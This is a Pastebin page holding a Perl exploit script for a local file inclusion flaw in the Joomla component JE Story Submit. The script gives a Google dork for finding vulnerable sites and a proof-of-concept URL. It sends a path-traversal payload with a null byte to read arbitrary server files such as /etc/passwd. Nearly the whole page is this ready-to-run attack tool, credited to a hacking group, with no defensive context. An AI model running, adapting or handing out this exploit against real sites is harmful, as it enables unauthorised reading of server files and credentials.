Googleinurl

[SCRIPT]=> Joomla Component JE Story Submit Local File Inclu

Aug 27th, 2014
1,002
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #! /usr/bin/perl -w
  2.  
  3. # Joomla Component JE Story Submit Local File Inclusion Vulnerability
  4. # Author   : K1LL57R34K (Pwnd Brasil)
  5. # Date     : July, 21-2011 GMT +7:00 São Paulo, Brazil.
  6. # Software : JE Story Submit
  7. # Vendor   : http://joomlaextensions.co.in/
  8. # License  : GPLv2 or later
  9. # Tested On: Joomla 1.5.x
  10. #
  11. # PoC - http://127.0.0.1/[path]/index.php?option=com_jesubmit&view=[LFI]%00
  12. #
  13.  
  14. use LWP::UserAgent;
  15. use HTTP::Request::Common;
  16.  
  17. my ($host, $file) = @ARGV ;
  18.  
  19. sub clear{
  20. system(($^O eq 'MSWin32') ? 'cls' : 'clear'); }
  21. clear();
  22. print "|==========================================================|\n";
  23. print "|  'Joomla Component JE Story Submit Local File Inclusion' |\n";
  24. print "| Coded by : K1LL57R34K                                    |\n";
  25. print "| Dork     : inurl:com_jesubmit                            |\n";
  26. print "|                                                          |\n";
  27. print "|                            http://twitter.com/pwndbrasil |\n";
  28. print "|                                                          |\n";
  29. print "|===================================[ YOGYACARDERLINK ]====|\n";
  30. print "\nUsage: perl $0 <target> <file_to_edit>\n";
  31. print "\tex: perl $0 http://www.site.com /etc/passwd\n\n";
  32.  
  33. $host = 'http://'.$host if ($host !~ /^http:/);
  34. $host .= "/" if ($host !~ /\/\$/);
  35.  
  36. my $ua = LWP::UserAgent->new();
  37. $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1");
  38. $ua->timeout(10);
  39.  
  40. my $request = HTTP::Request->new();
  41. my $response;
  42. my $url = $host."index.php?";
  43.  
  44. my $req = HTTP::Request->new(POST => $host."index.php?");
  45. $req->content_type('application/x-www-form-urlencoded');
  46. $req->content("option=com_jesubmit&view=".("/.."x10).$file."%00");
  47.  
  48. $request = $ua->request($req);
  49. $result = $request->content;
  50.  
  51. $result =~ s/<[^>]*>//g;
  52.  
  53. print $result . "\n";
  54. exit;
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×